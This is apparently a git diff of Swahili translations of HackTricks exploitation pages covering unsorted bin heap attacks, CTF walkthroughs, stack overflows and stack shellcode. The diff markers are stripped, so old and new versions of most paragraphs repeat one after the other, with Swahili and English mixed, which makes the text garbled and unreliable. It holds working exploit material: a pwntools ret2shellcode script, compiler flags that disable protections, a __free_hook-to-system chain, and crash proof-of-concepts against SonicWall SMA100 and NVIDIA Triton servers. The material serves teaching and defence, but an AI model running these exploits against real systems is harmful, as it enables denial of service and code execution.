> • Ikiwa programu inakataza mara moja kwenye allocation inayofuata kutokana na unsorted-bin checks, angalia tena kwamba `victim->fd` bado ni sawa na bin head na kwamba `TARGET` yako inashikilia pointer halisi ya `victim` baada ya uandishi wa kwanza.
## Unsorted Bin Infoleak Attack
Hii kwa kweli ni dhana rahisi. Chunks katika unsorted bin zitakuwa na pointers. Chunk ya kwanza katika unsorted bin itakuwa na viungo vya **`fd`** na **`bk`** **vinavyorejelea sehemu ya main arena (Glibc)**.\
Kwa hiyo, ikiwa unaweza **kuweka chunk ndani ya unsorted bin na kuisoma** (use after free) au **kuiallocate tena bila kuandika juu angalau moja ya pointers** kisha **kuisoma**, unaweza kupata **Glibc info leak**.
Hii ni dhana rahisi kabisa. Chunks katika unsorted bin zitakuwa na pointers. Chunk ya kwanza katika unsorted bin itakuwa na viungo vya **`fd`** na **`bk`** **vinavyoelekeza kwenye sehemu ya main arena (Glibc)**.\
Kwa hiyo, ikiwa unaweza **kuweka chunk ndani ya unsorted bin na kui-soma** (use after free) au **kuui-allocate tena bila kuandika juu ya angalau moja ya pointers** kisha **kusoma** hiyo chunk, unaweza kupata **Glibc info leak**.
A attack sawa [**attack used in this writeup**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html), ilikuwa kutumia muundo wa chunks 4 (A, B, C na D - D iko tu kuzuia consolidation na top chunk) hivyo overflow ya null byte kwenye B ilitumika kufanya C kuonyesha kuwa B haikutumika. Pia, kwenye B `prev_size` ilibadilishwa hivyo ukubwa, badala ya kuwa ukubwa wa B, ulikuwa A+B.\
Kisha C ilifutwa, na ikaunganishwa na A+B (lakini B bado ilikuwa inatumika). Chunk mpya ya ukubwa A ilitengenezwa kisha libc leaked addresses ziliandikwa ndani ya B kutoka pale zilipoleak.
A [**shambulio sawa kilichotumika katika writeup hii**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html), kilitumia muundo wa chunks 4 (A, B, C na D - D ilikuwepo tu kuzuia consolidation na top chunk) hivyo overflow ya null byte katika B ilitumika kufanya C kuonyesha kuwa B haikutumika. Pia, ndani ya B data ya `prev_size` ilibadilishwa hivyo ukubwa badala ya kuwa ukubwa wa B ulikuwa A+B.\
Kisha C ilifunguliwa (deallocated), na ikaunganishwa na A+B (lakini B bado ilikuwa inatumika). Chunk mpya ya ukubwa A ili-allocatewa na kisha libc leaked addresses ziliandikwa ndani ya B kutoka palipozoleak.
## References & Other examples
- [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap)
- Lengo ni kuchapisha (overwrite) global variable na thamani kubwa kuliko 4869 ili iwezekane kupata flag na PIE haijatumiwa.
- Inawezekana kutengeneza chunks za ukubwa wowote na kuna heap overflow kwa ukubwa unaohitajika.
- Shambulio linaanza kwa kuunda chunks 3: chunk0 kwa kutumia overflow, chunk1 itakayofanywa overflow na chunk2 ili top chunk isiyoungane na zile zilizotangulia.
- Kisha, chunk1 inafree-uliwa na chunk0 inaoverflow hadi `bk` pointer ya chunk1 ionyeshe: `bk = magic - 0x10`
- Kisha, chunk3 inaitwa na kuallocate kwa ukubwa sawa na chunk1, ambayo itasababisha unsorted bin attack na kubadilisha thamani ya global variable, kuruhusu kupata flag.
- Lengo ni kuandika juu global variable na thamani kubwa kuliko 4869 ili iwezekane kupata flag na PIE haijawekwa.
- Inawezekana kutengeneza chunks za ukubwa wowote na kuna heap overflow kwa ukubwa unaotakiwa.
- Shambulio linaanza kwa kuunda chunks 3: chunk0 ili kutumika kwa overflow, chunk1 itakayezidiwa (to be overflowed) na chunk2 ili top chunk isiunge pamoja na zilizotangulia.
- Kisha, chunk1 inaachiliwa na chunk0 inafinywa hadi `bk` pointer ya chunk1 inavyoonyesha: `bk = magic - 0x10`
- Kisha, chunk3 ina-allocatewa kwa ukubwa sawa na chunk1, ambayo itachochea unsorted bin attack na itabadilisha thamani ya global variable, ikifanya iwezekane kupata flag.
- [**https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html**](https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html)
- Function ya merge ni vulnerabile kwa sababu iwapo index zote mbili zinazopitishwa ni sawa itafanya realloc juu yake na kisha free lakini ikarejesha pointer kwa eneo lililofutwa ambalo linaweza kutumika.
- Kwa hiyo, **chunks 2 ziliundwa**: **chunk0** ambayo itachanganywa na yenyewe na chunk1 ili kuzuia consolidation na top chunk. Kisha, function ya **merge** inaitwa na chunk0 mara mbili ambayo itasababisha use after free.
- Kisha, function ya **`view`** inaitwa na index 2 (ambayo ni index ya chunk ya use after free), ambayo ita**leak** anwani ya libc.
- Kwa kuwa binary ina ulinzi wa kuzuia malloc sizes ndogo kuliko **`global_max_fast`** hivyo hakuna fastbin inayotumiwa, unsorted bin attack itatumika kuchapisha `global_max_fast`.
- Kisha, inawezekana kuita function ya edit kwa index 2 (pointer ya use after free) na kubadilisha `bk` pointer ili iendelee kuonyesha kwa `p64(global_max_fast-0x10)`. Kisha, kuunda chunk mpya kutatumia address ya free iliyoharibiwa (0x20) na **kusababisha unsorted bin attack** ikichapisha `global_max_fast` kuwa thamani kubwa sana, ikiruhusu sasa kuunda chunks katika fast bins.
- Sasa shambulio la **fast bin** linafanywa:
- Kwanza iligundulika kwamba inawezekana kufanya kazi na fast **chunks za size 200** katika eneo la **`__free_hook`**:
- Kazi ya merge ina vunjao kwa sababu ikiwa index zote mbili zilizoingizwa ni ile ile itafanya realloc juu yake kisha kuifree lakini ikirudisha pointer kwa eneo hilo lililofunguliwa ambalo linaweza kutumika.
- Kwa hivyo, **chunks 2 zinaundwa**: **chunk0** ambayo itaunganishwa na yenyewe na chunk1 ili kuzuia consolidation na top chunk. Kisha, function ya **merge** inaitwa na chunk0 mara mbili ambayo itasababisha use after free.
- Kisha, function ya **`view`** inaitwa na index 2 (ambayo ni index ya pointer ya use after free), ambayo itafanya **leak ya anwani ya libc**.
- Kwa kuwa binary ina ulinzi wa ku-malloc tu sizes zaidi ya **`global_max_fast`** hivyo hakuna fastbin inayotumika, unsorted bin attack itatumika kuandika juu global variable `global_max_fast`.
- Kisha, inawezekana kuita function ya edit na index 2 (pointer ya use after free) na kuandika juu `bk` pointer kuifanya iendelee kwa `p64(global_max_fast-0x10)`. Kisha, kuunda chunk mpya kutatumia address ya freed iliyodanganywa (0x20) kuta**trigger unsorted bin attack** na kuandika juu `global_max_fast` kuwa thamani kubwa sana, kuruhusu sasa kuunda chunks kwenye fast bins.
- Sasa shambulio la **fast bin** linatekelezwa:
- Kwanza iligundulika inawezekana kufanya kazi na fast **chunks za ukubwa 200** katika eneo la **`__free_hook`**:
- <pre class="language-c"><code class="lang-c">gef➤ p &__free_hook
$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
gef➤ x/60gx 0x7ff1e9e607a8 - 0x59
@ -115,17 +117,17 @@ gef➤ x/60gx 0x7ff1e9e607a8 - 0x59
0x7ff1e9e6076f <list_all_lock+15>: 0x0000000000000000 0x0000000000000000
0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000
</code></pre>
- Ikiwa tunafanikiwa kupata fast chunk ya size 0x200 katika eneo hili, itakuwa uwezekano wa kuchapisha function pointer itakayotekelezwa.
- Kwa hili, chunk mpya ya size `0xfc` inaundwa na merged function inaitwa nayo mara mbili, kwa njia hii tunapata pointer kwa freed chunk ya size `0xfc*2 = 0x1f8` katika fast bin.
- Kisha, function ya edit inaitwa kwenye chunk hii kubadilisha anwani ya **`fd`** ya fast bin hii ili iwekelee kwenye `__free_hook`.
- Kisha, chunk ya size `0x1f8` inaundwa ili kurejesha kutoka fast bin chunk isiyotumika, kisha chunk nyingine ya size `0x1f8` inaundwa kupata fast bin chunk katika **`__free_hook`** ambayo inachapishwa na anwani ya function ya **`system`**.
- Na hatimaye chunk yenye string `/bin/sh\x00` inafree-uliwa kwa kutumia function ya delete, kutekeleza **`__free_hook`** ambayo sasa inaonyesha system na `/bin/sh\x00` kama parameta.
- Ikiwa tunaweza kupata fast chunk ya size 0x200 katika eneo hili, itakuwa inaweza kuandika juu function pointer ambayo itatekelezwa
- Kwa hili, chunk mpya ya size `0xfc` inaundwa na merged function inaitwa na pointer hiyo mara mbili, kwa njia hii tunapata pointer kwa chunk iliyofunguliwa ya size `0xfc*2 = 0x1f8` katika fast bin.
- Kisha, function ya edit inaitwa katika chunk hii ili kubadilisha anwani ya **`fd`** ya fast bin hii kuielekeza kwenye **`__free_hook`**.
- Kisha, chunk ya size `0x1f8` inaundwa ili kurejesha kutoka fast bin chunk iliyokuwa haina maana hivyo chunk nyingine ya size `0x1f8` inaundwa kupata fast bin chunk katika **`__free_hook`** ambayo inaandika juu na anwani ya `system`.
- Na hatimaye chunk lenye string `/bin/sh\x00` linafrees kwa kuitwa delete function, kuchochea **`__free_hook`** ambayo inabeba system na `/bin/sh\x00` kama parameter.
- **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html)
- Mfano mwingine wa kutumia overflow ya 1B kuunganisha chunks katika unsorted bin na kupata libc infoleak na kisha kufanya fast bin attack kubadilisha malloc hook kwa one gadget address
- Mfano mwingine wa kutumia 1B overflow kuunganisha chunks katika unsorted bin na kupata libc infoleak kisha kutekeleza fast bin attack kuandika juu malloc hook na one gadget address
- [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/)
- Tunaweza tu kuallocate chunks za size kubwa kuliko `0x100`.
- Chapisha `global_max_fast` kwa kutumia Unsorted Bin attack (inafanya kazi 1/16 mara kutokana na ASLR, kwa sababu tunahitaji kubadilisha bit 12, lakini lazima tubadilishe bit 16).
- Fast Bin attack kubadilisha array ya global ya chunks. Hii inatoa primitive ya arbitrary read/write, ambayo inaruhusu kubadilisha GOT na kuweka function fulani ili ianze kuonyesha `system`.
- Tunaweza tu kuallocate chunks za size zaidi ya `0x100`.
- Kufanya overwrite ya `global_max_fast` kwa kutumia Unsorted Bin attack (inafanya kazi 1/16 kwa sababu ya ASLR, kwa sababu tunahitaji kubadilisha 12 bits, lakini lazima tubadilishe 16 bits).
- Fast Bin attack kubadilisha global array ya chunks. Hii inatoa primitive ya arbitrary read/write, ambayo inaruhusu kubadilisha GOT na kuweka function fulani kuonyesha `system`.
## References

78
src/binary-exploitation/stack-overflow/README.md
View File

@ -4,13 +4,15 @@
## Stack Overflow ni nini
A **stack overflow** ni udhaifu unaotokea wakati programu inaandika data zaidi kwenye stack kuliko iliyopewa kuhifadhi. Data ziizozidi zitabadilisha **nafasi ya kumbukumbu iliyo karibu (overwrite adjacent memory space)**, na kusababisha uharibifu wa data halali, kuingiliwa kwa mtiririko wa udhibiti, na uwezekano wa kutekelezwa kwa msimbo wa uharibifu. Tatizo hili mara nyingi hutokana na matumizi ya functions zisizo salama ambazo hazifanyi ukaguzi wa mipaka kwenye input.
A **stack overflow** ni udhaifu unaotokea wakati programu inaandika data nyingi zaidi kwenye stack kuliko ilivyogawiwa kubeba. Data hizi ziada zinaweza **kuandika juu ya nafasi za kumbukumbu jirani**, na kusababisha uharibifu wa data halali, kuvuruga control flow, na pengine utekelezaji wa malicious code. Tatizo hili mara nyingi linasababishwa na matumizi ya functions zisizo salama ambazo hazifanyi ukaguzi wa mipaka kwenye input.
Shida kuu ya kufunika hii ni kwamba **saved instruction pointer (EIP/RIP)** na **saved base pointer (EBP/RBP)** za kurudi kwenye function iliyopita **zimehifadhiwa kwenye stack**. Kwa hivyo, mshambuliaji ataweza kuzifunika na **kudhibiti mtiririko wa utekelezaji wa programu**.
Shida kuu ya kuandika juu ni kwamba **saved instruction pointer (EIP/RIP)** na **saved base pointer (EBP/RBP)** za kurudi kwa function iliyotangulia zimetengwa kwenye stack. Kwa hiyo, mshambuliaji anaweza kuzibadilisha na **kudhibiti mtiririko wa utekelezaji wa programu**.
Udhaifu huu kawaida hutokea kwa sababu function **inakopa ndani ya stack bytes zaidi kuliko kiasi kilichotengwa kwa ajili yake**, hivyo kuweza kufunika sehemu nyingine za stack.
Udhaifu huu kawaida unatokea kwa sababu function **inakopa ndani ya stack bytes zaidi kuliko ilivyotengwa kwake**, hivyo kuwa na uwezo wa kuandika juu ya sehemu zingine za stack.
Baadhi ya functions za kawaida zilizo hatarini kwa hili ni: **`strcpy`, `strcat`, `sprintf`, `gets`**... Pia, functions kama **`fgets`**, **`read`** & **`memcpy`** ambazo zinachukua **kigezo cha urefu (length argument)**, zinaweza kutumika kwa njia hatarishi ikiwa urefu uliobainishwa ni mkubwa kuliko ule uliotengwa.
Some common functions vulnerable to this are: **`strcpy`, `strcat`, `sprintf`, `gets`**... Also, functions like **`fgets`**, **`read`** & **`memcpy`** that take a **length argument**, might be used in a vulnerable way if the specified length is greater than the allocated one.
For example, the following functions could be vulnerable:
```c
void vulnerable() {
char buffer[128];
@ -19,13 +21,13 @@ gets(buffer); // This is where the vulnerability lies
printf("You entered: %s\n", buffer);
}
```
### Kupata Stack Overflows offsets
### Kupata offsets za Stack Overflow
Njia ya kawaida zaidi ya kupata stack overflows ni kutoa input kubwa sana ya `A`s (e.g. `python3 -c 'print("A"*1000)'`) na kutegemea `Segmentation Fault` inayoonyesha kwamba **anwani `0x41414141` ilijaribu kufikiwa**.
Njia inayotumika zaidi kutambua stack overflows ni kutoa input kubwa sana ya `A`s (mfano `python3 -c 'print("A"*1000)'`) na kutarajia `Segmentation Fault` inayoonyesha kuwa **address `0x41414141` ilijaribiwa kufikiwa**.
Zaidi ya hayo, mara baada ya kugundua kuwa kuna udhaifu wa Stack Overflow, utahitaji kupata offset hadi iwezekane **kuandika upya return address**; kwa hili kawaida hutumika **De Bruijn sequence.** Kwa alfabeti yenye ukubwa _k_ na subsequences za urefu _n_, ni **mfululizo wa mviringo ambapo kila subsequence inayowezekana ya urefu _n_ inaonekana mara moja tu** kama subsequence zilizo mfululizo.
Zaidi ya hayo, mara utakapogundua kuna Stack Overflow vulnerability utahitaji kupata offset hadi iwezekane **overwrite the return address**, kwa hili kawaida hutumika **De Bruijn sequence.** Kwa alfabeti ya ukubwa _k_ na subsequences za urefu _n_ ni **mlolongo wa cyclic ambapo kila subsequence inayowezekana ya urefu _n_ inaonekana kabisa mara moja** kama subsequence mfululizo.
Kwa njia hii, badala ya kujaribu kwa mkono kugundua offset inayohitajika kudhibiti EIP, inawezekana kutumia mojawapo ya mfululizo huu kama padding kisha kutafuta offset ya bytes ambazo ziliendelea kuandika juu yake.
Kwa njia hii, badala ya kujaribu kubaini kwa mkono offset inayohitajika kudhibiti EIP, inawezekana kutumia mfululizo mmoja wa haya kama padding kisha kupata offset ya bytes ambazo zinaisha ku-overwrite.
Inawezekana kutumia **pwntools** kwa hili:
```python
@ -46,16 +48,16 @@ pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
```
## Kutumia Stack Overflows
## Exploiting Stack Overflows
During an overflow (supposing the overflow size if big enough) you will be able to **kuandika juu** values of local variables inside the stack until reaching the saved **EBP/RBP and EIP/RIP (or even more)**.\
Njia ya kawaida ya kutumia aina hii ya udhaifu ni kwa **kubadilisha return address** ili wakati function itakapomalizika **control flow itapelekwa mahali popote mtumiaji alibainisha** kwenye pointer hii.
During an overflow (supposing the overflow size if big enough) you will be able to **kubadilisha** values of local variables inside the stack until reaching the saved **EBP/RBP and EIP/RIP (or even more)**.\
The most common way to abuse this type of vulnerability is by **modifying the return address** so when the function ends the **control flow will be redirected wherever the user specified** in this pointer.
Hata hivyo, katika nyakati nyingine labda tu **kuandika juu baadhi ya thamani za vigezo kwenye stack** inaweza kutosha kwa exploitation (kama katika changamoto rahisi za CTF).
However, in other scenarios maybe just **kuandika juu ya baadhi ya thamani za vigezo kwenye stack** might be enough for the exploitation (like in easy CTF challenges).
### Ret2win
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. Kwa changamoto hizi unahitaji tu kupata **offset ya kuandika juu return address** na **kupata address ya function** ya kuitwa (kawaida [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) itakuwa imezimwa) ili wakati function iliyo na udhaifu inaporudi, function iliyofichwa itaitwa:
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called:
{{#ref}}
@ -64,7 +66,7 @@ ret2win/
### Stack Shellcode
Kwenye senario hii mshambuliaji anaweza kuweka shellcode kwenye stack na kutumia EIP/RIP iliyodhibitiwa kuruka kwenye shellcode na kutekeleza msimbo yoyote:
In this scenario the attacker could place a shellcode in the stack and use the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
{{#ref}}
@ -73,7 +75,7 @@ stack-shellcode/
### Windows SEH-based exploitation (nSEH/SEH)
On 32-bit Windows, an overflow may overwrite the Structured Exception Handler (SEH) chain instead of the saved return address. Exploitation typically replaces the SEH pointer with a POP POP RET gadget and uses the 4-byte nSEH field for a short jump to pivot back into the large buffer where shellcode lives. Mfano wa kawaida ni short jmp katika nSEH inayomwaga kwenye 5-byte near jmp iliyowekwa kabla kabisa ya nSEH kuruka mamia ya bytes nyuma kwenye mwanzo wa payload.
On 32-bit Windows, an overflow may overwrite the Structured Exception Handler (SEH) chain instead of the saved return address. Exploitation typically replaces the SEH pointer with a POP POP RET gadget and uses the 4-byte nSEH field for a short jump to pivot back into the large buffer where shellcode lives. A common pattern is a short jmp in nSEH that lands on a 5-byte near jmp placed just before nSEH to jump hundreds of bytes back to the payload start.
{{#ref}}
@ -82,7 +84,7 @@ windows-seh-overflow.md
### ROP & Ret2... techniques
Mbinu hii ni mfumo wa msingi wa kukwepa ulinzi mkuu wa mbinu iliyotangulia: **No executable stack (NX)**. Na inaruhusu kutekeleza mbinu nyingine kadhaa (ret2lib, ret2syscall...) ambazo zitaisha zikifanya maagizo yoyote kwa kutumia maagizo yaliyopo ndani ya binary:
This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack (NX)**. And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing instructions in the binary:
{{#ref}}
@ -98,7 +100,7 @@ An overflow is not always going to be in the stack, it could also be in the **he
../libc-heap/heap-overflow.md
{{#endref}}
## Aina za ulinzi
## Types of protections
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
@ -109,34 +111,34 @@ There are several protections trying to prevent the exploitation of vulnerabilit
### Real-World Example: CVE-2025-40596 (SonicWall SMA100)
Uonyesho mzuri wa kwanini **`sscanf` haipaswi kamwe kuaminiwa kwa kuchakata input isiyothibitishwa** ulitokea mwaka 2025 katika kifaa cha SonicWall SMA100 SSL-VPN.
Routi iliyo na udhaifu ndani ya `/usr/src/EasyAccess/bin/httpd` inajaribu kutoa version na endpoint kutoka URI yoyote inayoanza na `/__api__/`:
Mfano mzuri wa kwanini **`sscanf` haipaswi kamwe kuaminiwa kwa kuparsa input isiyoaminika** ulitokea mwaka 2025 kwenye kifaa cha SonicWall SMA100 SSL-VPN.
The vulnerable routine inside `/usr/src/EasyAccess/bin/httpd` attempts to extract the toleo and endpoint from any URI that begins with `/__api__/`:
```c
char version[3];
char endpoint[0x800] = {0};
/* simplified proto-type */
sscanf(uri, "%*[^/]/%2s/%s", version, endpoint);
```
1. Uongofu wa kwanza (`%2s`) huhifadhi kwa usalama **baiti mbili** ndani ya `version` (mfano `"v1"`).
2. Uongofu wa pili (`%s`) **hauna kipimo cha urefu**, kwa hivyo `sscanf` itaendelea kunakili **hadi baiti ya kwanza ya NUL**.
3. Kwa sababu `endpoint` iko kwenye **stack** na ni **0x800 bytes long**, kutoa path ndefu kuliko 0x800 bytes kunaharibu kila kitu kilicho baada ya buffer ikiwa ni pamoja na **stack canary** na **saved return address**.
1. Ubadilishaji wa kwanza (`%2s`) unaweka kwa usalama **mbili** bytes ndani ya `version` (e.g. `"v1"`).
2. Ubadilishaji wa pili (`%s`) **haina specifier ya urefu**, kwa hivyo `sscanf` itaendelea kunakili **hadi byte ya kwanza ya NUL**.
3. Kwa kuwa `endpoint` iko kwenye **stack** na ni **0x800 bytes long**, kutoa path inayozidi 0x800 bytes kunaharibu kila kitu kinachofuatia buffer ikiwa ni pamoja na **stack canary** na **saved return address**.
Mfano wa proof-of-concept wa mstari mmoja unatosha kusababisha crash **kabla ya authentication**:
Mstari mmoja wa proof-of-concept unatosha kusababisha crash **before authentication**:
```python
import requests, warnings
warnings.filterwarnings('ignore')
url = "https://TARGET/__api__/v1/" + "A"*3000
requests.get(url, verify=False)
```
Even though stack canaries abort the process, an attacker still gains a **Denial-of-Service** primitive (and, with additional information leaks, possibly code-execution). The lesson is simple:
Ingawa stack canaries husababisha mchakato kusimamishwa, mshambulizi bado anapata primitive ya **Denial-of-Service** (na, ikiwa kutakuwa na additional information leaks, huenda code-execution). Somo ni rahisi:
* Daima toa **upana wa uwanja wa juu kabisa** (kwa mfano `%511s`).
* Daima eleza **maximum field width** (mfano `%511s`).
* Pendelea mbadala salama kama `snprintf`/`strncpy_s`.
### Mfano halisi: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)
### Mfano wa Maisha Halisi: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)
NVIDIAs Triton Inference Server (≤ v25.06) ilikuwa na **stack-based overflows** nyingi zinazofikika kupitia HTTP API yake.
Muundo hatarishi ulijirudia katika `http_server.cc` na `sagemaker_server.cc`:
NVIDIAs Triton Inference Server (≤ v25.06) ilikuwa na multiple **stack-based overflows** zinazoweza kufikiwa kupitia HTTP API yake.
Muundo wenye udhaifu ulirudiwa mara kwa mara katika `http_server.cc` na `sagemaker_server.cc`:
```c
int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
if (n > 0) {
@ -146,9 +148,9 @@ alloca(sizeof(struct evbuffer_iovec) * n);
...
}
```
1. `evbuffer_peek` (libevent) hurudisha **idadi ya sehemu za buffer za ndani** ambazo zinaunda mwili wa ombi la HTTP wa sasa.
2. Kila sehemu husababisha `evbuffer_iovec` ya **16-byte** kupewa nafasi kwenye **stack** kupitia `alloca()` **bila kikomo cha juu**.
3. Kwa kutumia vibaya **HTTP _chunked transfer-encoding_**, mteja anaweza kulazimisha ombi kugawanywa kuwa **mamia ya maelfu ya vipande vya 6-byte** (`"1\r\nA\r\n"`). Hii inafanya `n` ikue bila kikomo hadi **stack** itakapomalizika.
1. `evbuffer_peek` (libevent) inarudisha **idadi ya sehemu za buffer za ndani** zinazounda mwili wa ombi la HTTP la sasa.
2. Kila sehemu husababisha `evbuffer_iovec` ya **16-byte** kugawiwa kwenye **stack** kupitia `alloca()` **bila kikomo cha juu**.
3. Kwa kutumia vibaya **HTTP _chunked transfer-encoding_**, mteja anaweza kulazimisha ombi kugawanywa kuwa **mamia ya maelfu ya vipande vya 6-byte** (`"1\r\nA\r\n"`). Hii inafanya `n` ikue bila kikomo hadi **stack** itakapokosa nafasi.
#### Uthibitisho wa Dhana (DoS)
```python
@ -174,10 +176,10 @@ s.close()
if __name__ == "__main__":
exploit(*sys.argv[1:])
```
Ombi la takriban ~3 MB linatosha kuandika upya anwani ya kurudi iliyohifadhiwa na **crash** daemon kwenye default build.
Ombi la ~3 MB linatosha kuandika tena anwani ya kurudi iliyohifadhiwa na kusababisha **crash** ya daemon katika default build.
#### Patch & Mitigation
Toleo la 25.07 linabadilisha unsafe stack allocation kuwa **heap-backed `std::vector`** na linashughulikia `std::bad_alloc` kwa heshima:
#### Patch & Kupunguza Hatari
Toleo la 25.07 linachukua nafasi ya ugawaji wa stack usio salama na **heap-backed `std::vector`** na linashughulikia `std::bad_alloc` kwa upole:
```c++
std::vector<evbuffer_iovec> v_vec;
try {
@ -188,11 +190,11 @@ return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
struct evbuffer_iovec *v = v_vec.data();
```
Mafunzo yaliyopatikana:
* Kamwe usiite `alloca()` ukiwa na ukubwa unaodhibitiwa na mshambulizi.
* Chunked requests zinaweza kubadilisha kwa kiasi kikubwa muundo wa buffers za upande wa server.
* Thibitisha / weka kikomo thamani yoyote inayotokana na maingizo ya mteja *kabla* ya kuitumia katika ugawaji wa kumbukumbu.
* Usiwahi kuita `alloca()` kwa ukubwa unaodhibitiwa na mshambuliaji.
* Maombi ya chunked yanaweza kubadilisha sana umbo la buffer za upande wa seva.
* Thibitisha / weka kikomo kwa thamani yoyote inayotokana na ingizo la mteja *kabla ya* kuitumia katika ugawaji wa kumbukumbu.
## References
## Marejeo
* [watchTowr Labs Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
* [Trail of Bits Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)
* [HTB: Rainbow SEH overflow to RCE over HTTP (0xdf)](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)

69
src/binary-exploitation/stack-overflow/stack-shellcode/README.md
View File

@ -4,11 +4,11 @@
## Taarifa za Msingi
**Stack shellcode** ni mbinu inayotumika katika **binary exploitation** ambapo mshambuliaji anaandika shellcode kwenye stack ya programu dhaifu na kisha hubadilisha **Instruction Pointer (IP)** au **Extended Instruction Pointer (EIP)** ili kuielekeza kwenye eneo la shellcode hiyo, na kusababisha itekelezwe. Hii ni njia ya klasik inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri za hiari kwenye mfumo wa lengo. Hapa kuna uchanganuzi wa mchakato, ikiwa ni pamoja na mfano rahisi wa C na jinsi unavyoweza kuandika exploit inayoendana ukitumia Python na **pwntools**.
**Stack shellcode** ni mbinu inayotumika katika **binary exploitation** ambapo mshambuliaji anaandika shellcode kwenye stack ya programu yenye udhaifu na kisha hubadilisha **Instruction Pointer (IP)** au **Extended Instruction Pointer (EIP)** ili kuonyesha eneo la shellcode hiyo, na kusababisha itekelezwe. Hii ni mbinu ya kawaida inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri zozote kwenye mfumo lengwa. Hapa kuna muhtasari wa mchakato, ikijumuisha mfano rahisi wa C na jinsi unaweza kuandika exploit inayolingana ukitumia Python na **pwntools**.
### Mfano wa C: Programu dhaifu
### Mfano wa C: Programu yenye udhaifu
Tuanze na mfano rahisi wa programu dhaifu ya C:
Hebu tuanze na mfano rahisi wa programu ya C yenye udhaifu:
```c
#include <stdio.h>
#include <string.h>
@ -24,22 +24,22 @@ printf("Returned safely\n");
return 0;
}
```
Programu hii iko hatarini kwa buffer overflow kutokana na matumizi ya `gets()` function.
Programu hii ni nyeti kwa buffer overflow kutokana na matumizi ya kazi ya `gets()`.
### Kujenga
Ili kujenga programu hii huku ukizima ulinzi mbalimbali (to simulate a vulnerable environment), unaweza kutumia amri ifuatayo:
Ili kujenga programu hii huku ukizima ulinzi mbalimbali (ili kuiga mazingira yenye udhaifu), unaweza kutumia amri ifuatayo:
```sh
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
```
- `-fno-stack-protector`: Inazima stack protection.
- `-z execstack`: Hufanya stack executable, jambo linalohitajika kwa kutekeleza shellcode iliyohifadhiwa kwenye stack.
- `-no-pie`: Inazima Position Independent Executable, na hivyo kurahisisha kutabiri memory address ambapo shellcode yetu itakuwa.
- `-m32`: Hucompile programu kama 32-bit executable, mara nyingi kutumika kwa urahisi katika exploit development.
- `-fno-stack-protector`: Inazima ulinzi wa stack.
- `-z execstack`: Hufanya stack iwe executable, jambo muhimu ili kutekeleza shellcode iliyohifadhiwa kwenye stack.
- `-no-pie`: Inazima Position Independent Executable (PIE), ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwa.
- `-m32`: Inatengeneza programu kama executable ya 32-bit, mara nyingi hutumika kwa urahisi katika exploit development.
### Python Exploit using Pwntools
Hapa kuna jinsi unavyoweza kuandika exploit kwa Python ukitumia **pwntools** ili kufanya shambulio la **ret2shellcode**:
Hapa ni jinsi unavyoweza kuandika exploit kwa Python ukitumia **pwntools** ili kufanya **ret2shellcode** attack:
```python
from pwn import *
@ -66,25 +66,25 @@ payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide
p.sendline(payload)
p.interactive()
```
This script constructs a payload consisting of a **NOP slide**, the **shellcode**, and then overwrites the **EIP** with the address pointing to the NOP slide, ensuring the shellcode gets executed.
This script inaunda payload inayojumuisha **NOP slide**, the **shellcode**, na kisha inaandika tena **EIP** na anwani inayorejelea NOP slide, kuhakikisha shellcode inatekelezwa.
The **NOP slide** (`asm('nop')`) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the `p32()` argument to the starting address of your buffer plus an offset to land in the NOP slide.
The **NOP slide** (`asm('nop')`) inatumiwa kuongeza nafasi kwamba utekelezaji "utalizuka" ndani ya shellcode yetu bila kujali anwani kamili. Badilisha hoja ya `p32()` kwenda anwani ya kuanzia ya buffer yako pamoja na offset ili kumaliza kwenye NOP slide.
## Windows x64: Bypass NX with VirtualAlloc ROP (ret2stack shellcode)
